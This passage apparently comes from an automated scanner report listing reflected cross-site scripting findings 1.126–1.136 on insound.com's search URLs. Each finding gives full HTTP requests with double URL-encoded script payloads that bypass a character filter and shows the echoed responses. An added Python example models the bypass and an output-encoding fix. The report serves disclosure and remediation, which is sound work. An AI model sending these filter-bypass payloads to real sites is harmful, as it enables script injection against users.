Set-Cookie: PHPSESSID=7omhqihfrj5lm3st7ob0aehjb1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:22 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=455913808; expires=Sun, 09-Jan-2011 02:37:22 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=226681290; expires=Sun, 09-Jan-2011 02:37:22 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Deerhunter68d0e</title><script>alert(1)</script>ed1e899527</title>
...[SNIP]...

1.126. http://www.insound.com/search/query/Deerhunter&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Deerhunter&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cae0c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb67fa7d6406 was submitted in the REST URL parameter 3. This input was echoed as cae0c"><script>alert(1)</script>b67fa7d6406 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Deerhuntercae0c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb67fa7d6406&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=d5r7nd0bgr2g876klal4qq3411; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:16 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=419204218; expires=Sun, 09-Jan-2011 02:37:16 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=438247639; expires=Sun, 09-Jan-2011 02:37:16 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Deerhuntercae0c"><script>alert(1)</script>b67fa7d6406" />
...[SNIP]...
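The issue and remediation text above describe the mechanism but not what it looks like in code. The following added example (not code from the report or from insound.com) models it: the web server decodes the path segment once, a character filter runs on that value, the application then decodes a second time and interpolates the result raw into the two contexts the report shows, the <title> text and the double-quoted value attribute of the hidden input. The filter set and the rendering templates are assumptions about the application. The hardened version decodes once and HTML-encodes at the point of output; that, rather than stricter input validation alone, is what closes both contexts.

```python
"""Double-URL-decoding filter bypass (finding 1.126) and the hardened form.

Added example; the character filter, the second decode and the two output
templates are assumptions about the application, not its actual code.
"""
import html
from typing import Optional
from urllib.parse import unquote

BLOCKED = set('<>"\'')   # assumed: the characters the application tries to block

# Payload exactly as the report submitted it for finding 1.126 (double-encoded).
PAYLOAD_1126 = ("Deerhuntercae0c%2522%253e%253cscript%253ealert%25281%2529"
                "%253c%252fscript%253eb67fa7d6406")


def filter_passes(value: str) -> bool:
    """Assumed filter: reject the request if any blocked character is present."""
    return not (BLOCKED & set(value))


def vulnerable_render(path_segment: str) -> Optional[str]:
    """Assumed vulnerable flow: web server decodes once, the filter checks that
    value, the application decodes again and interpolates the result raw."""
    once = unquote(path_segment)            # the decode the web server already did
    if not filter_passes(once):
        return None                         # %22, %3c, %3e carry no blocked chars
    twice = unquote(once)                   # the redundant second decode
    return (f"<title>{twice}</title>\n"
            f'<input type="hidden" name="query" value="{twice}" />')


def hardened_render(path_segment: str) -> str:
    """Decode once, validate on that value if desired, then HTML-encode at output.
    html.escape(quote=True) is correct for both a text node and a "..." attribute."""
    once = unquote(path_segment)
    safe = html.escape(once, quote=True)
    return (f"<title>{safe}</title>\n"
            f'<input type="hidden" name="query" value="{safe}" />')


def contains_live_script(rendered: Optional[str]) -> bool:
    """True if the response carries the proof-of-concept script tag unencoded."""
    return rendered is not None and "<script>alert(1)</script>" in rendered


if __name__ == "__main__":
    v = vulnerable_render(PAYLOAD_1126)
    print(v)
    print("vulnerable flow renders live script:", contains_live_script(v))
    h = hardened_render(PAYLOAD_1126)
    print(h)
    print("hardened flow renders live script:", contains_live_script(h))
    # A single-encoded payload is caught by the filter in the vulnerable flow
    # and neutralised by output encoding in the hardened flow.
    single = "Deerhunter%22%3e%3cscript%3ealert%281%29%3c%2fscript%3e"
    print("single-encoded, vulnerable flow:", vulnerable_render(single))
    print("single-encoded, hardened flow:", hardened_render(single))
```

In the vulnerable flow the attribute line comes out exactly as the report shows it, value="Deerhuntercae0c"><script>alert(1)</script>b67fa7d6406" />. In the hardened flow the double-encoded payload stays as literal percent text and a single-encoded one becomes &quot;&gt;&lt;script&gt;, so neither context can be broken out of regardless of what the filter does.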

1.127. http://www.insound.com/search/query/Diamond%20Rings&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Diamond%20Rings&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload a33d8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a833c279fd was submitted in the REST URL parameter 3. This input was echoed as a33d8</title><script>alert(1)</script>6a833c279fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Diamond%20Ringsa33d8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a833c279fd&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=klrlto0i1c88teh5cmhu7v0d33; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:01 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=489386970; expires=Sun, 09-Jan-2011 02:41:01 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=163467593; expires=Sun, 09-Jan-2011 02:41:01 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38028

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Diamond Ringsa33d8</title><script>alert(1)</script>6a833c279fd</title>
...[SNIP]...

1.128. http://www.insound.com/search/query/Diamond%20Rings&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Diamond%20Rings&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2be0a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e213a1513519 was submitted in the REST URL parameter 3. This input was echoed as 2be0a"><script>alert(1)</script>213a1513519 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Diamond%20Rings2be0a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e213a1513519&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=0m0lbb9jd3huhpfjg0jlicuak4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:54 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=39895770; expires=Sun, 09-Jan-2011 02:40:54 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=360414629; expires=Sun, 09-Jan-2011 02:40:54 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Diamond Rings2be0a"><script>alert(1)</script>213a1513519" />
...[SNIP]...

1.129. http://www.insound.com/search/query/Dinosaur%20Jr.&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Dinosaur%20Jr.&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ba14%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecab2427d702 was submitted in the REST URL parameter 3. This input was echoed as 9ba14"><script>alert(1)</script>cab2427d702 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Dinosaur%20Jr.9ba14%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecab2427d702&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=k4hmmc0h0gf4rmj0ka0h98j3f5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:49 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=162281626; expires=Sun, 09-Jan-2011 02:37:49 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=278492688; expires=Sun, 09-Jan-2011 02:37:49 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Dinosaur Jr.9ba14"><script>alert(1)</script>cab2427d702" />
...[SNIP]...

1.130. http://www.insound.com/search/query/Dinosaur%20Jr.&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Dinosaur%20Jr.&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload eac63%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee2b7a9dd033 was submitted in the REST URL parameter 3. This input was echoed as eac63</title><script>alert(1)</script>e2b7a9dd033 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Dinosaur%20Jr.eac63%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee2b7a9dd033&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=oa8rvmvfkkqr86tln2ovsv8i82; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:55 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=551211424; expires=Sun, 09-Jan-2011 02:37:55 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=144886111; expires=Sun, 09-Jan-2011 02:37:55 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Dinosaur Jr.eac63</title><script>alert(1)</script>e2b7a9dd033</title>
...[SNIP]...

1.131. http://www.insound.com/search/query/Drake&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Drake&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 6b0e8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e17722ee5f98 was submitted in the REST URL parameter 3. This input was echoed as 6b0e8</title><script>alert(1)</script>17722ee5f98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Drake6b0e8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e17722ee5f98&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=mrdo3d27bb8v83fiqk01e4pqm6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:38 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=254220049; expires=Sun, 09-Jan-2011 02:37:38 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=94245834; expires=Sun, 09-Jan-2011 02:37:38 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Drake6b0e8</title><script>alert(1)</script>17722ee5f98</title>
...[SNIP]...

1.132. http://www.insound.com/search/query/Drake&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Drake&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5587e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a86562e007 was submitted in the REST URL parameter 3. This input was echoed as 5587e"><script>alert(1)</script>0a86562e007 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Drake5587e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a86562e007&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=nej7ac2kbjsvkap3o4nb9anjm0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:33 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=451027190; expires=Sun, 09-Jan-2011 02:37:33 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=158230381; expires=Sun, 09-Jan-2011 02:37:33 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Drake5587e"><script>alert(1)</script>0a86562e007" />
...[SNIP]...

1.133. http://www.insound.com/search/query/Flying%20Lotus&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Flying%20Lotus&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 1e953%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e58a6476d267 was submitted in the REST URL parameter 3. This input was echoed as 1e953</title><script>alert(1)</script>58a6476d267 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Flying%20Lotus1e953%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e58a6476d267&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=airj5deos56mpe6rl5qpeetdg7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:16 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=277153693; expires=Sun, 09-Jan-2011 02:38:16 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=45202073; expires=Sun, 09-Jan-2011 02:38:16 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Flying Lotus1e953</title><script>alert(1)</script>58a6476d267</title>
...[SNIP]...

1.134. http://www.insound.com/search/query/Flying%20Lotus&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Flying%20Lotus&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5bce%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f471c48308 was submitted in the REST URL parameter 3. This input was echoed as b5bce"><script>alert(1)</script>3f471c48308 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Flying%20Lotusb5bce%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f471c48308&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=kb4l5fao94snb98jem7okc4il6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:10 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=247799154; expires=Sun, 09-Jan-2011 02:38:10 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=56753403; expires=Sun, 09-Jan-2011 02:38:10 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Flying Lotusb5bce"><script>alert(1)</script>3f471c48308" />
...[SNIP]...

1.135. http://www.insound.com/search/query/Forest%20Swords&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Forest%20Swords&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 263a0%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef6a342b52bf was submitted in the REST URL parameter 3. This input was echoed as 263a0</title><script>alert(1)</script>f6a342b52bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Forest%20Swords263a0%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef6a342b52bf&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=43a31v6fb6ro13t21un80md8g6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:08 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=423200647; expires=Sun, 09-Jan-2011 02:40:08 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=478293011; expires=Sun, 09-Jan-2011 02:40:08 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Forest Swords263a0</title><script>alert(1)</script>f6a342b52bf</title>
...[SNIP]...

1.136. http://www.insound.com/search/query/Forest%20Swords&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Forest%20Swords&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e41bf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef44313cac23 was submitted in the REST URL parameter 3. This input was echoed as e41bf"><script>alert(1)</script>f44313cac23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Forest%20Swordse41bf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef44313cac23&from=47597/ HTTP/1.1
